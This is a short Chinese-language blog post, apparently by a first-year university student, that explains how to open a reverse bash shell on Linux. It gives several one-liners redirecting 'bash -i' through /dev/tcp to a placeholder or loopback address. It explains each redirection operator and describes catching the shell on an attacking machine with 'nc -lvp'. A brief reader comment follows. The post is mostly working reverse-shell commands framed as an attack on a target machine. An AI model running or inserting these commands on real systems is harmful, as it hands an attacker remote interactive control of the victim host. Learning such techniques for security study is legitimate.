Linux反弹bash_shell

vFREE
2021-10-08 / 1 评论 / 55 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2021年12月07日,已超过293天没有更新,若内容或图片失效,请留言反馈。

阿巴阿巴

兄弟姐妹们,我军训结束了,正式开启大一生活~

bash

first

bash -i > /dev/tcp/ipaddr/port 
bash -i > /dev/tcp/127.0.0.1/2345
  • bash -i:打开一个bash交互界面
  • \>:重定向
  • /dev/tcp:调用建立一个socket连接
  • 127.0.0.1:可以任意更改需要反弹到的IP地址
  • 2345:反弹到的端口

上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到
1
攻击机使用 nc -lvp 2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令

second

bash -i >& /dev/tcp/127.0.0.1/2345 0>&1
这种就是交互式shell了
  • &:标准错误输出重定向输出
  • 0>&1:简单一点理解就是将我们在攻击机输入的命令当成靶机输入,然后靶机返回内容时又重定向攻击机,也就是交互界面,打开了一个shell窗口,随意可以在攻击机执行命令,然后在攻击机输出结果,这么一个意思
  • 0:标准输入
  • 1:标准输出
  • 2:标准错误输出
  • &:是为了区分标准输出和文件描述符1

third

bash -i > /dev/tcp/127.0.0.1/2345 0>&1 2>&1
和上面的效果一样

fourth

bash -i >& /dev/tcp/127.0.0.1/2345 0>&1
值得一提的是,">&"相当于"2>&1",标准错误输出
一个标准的反弹shell语句种,最好是有标准输入输出和标准输出
3

评论 (1)

取消
  1. 头像
    shell bash
    Windows 10 · Google Chrome

    学到老活到老,不愧是你啊,楼上好棒

    回复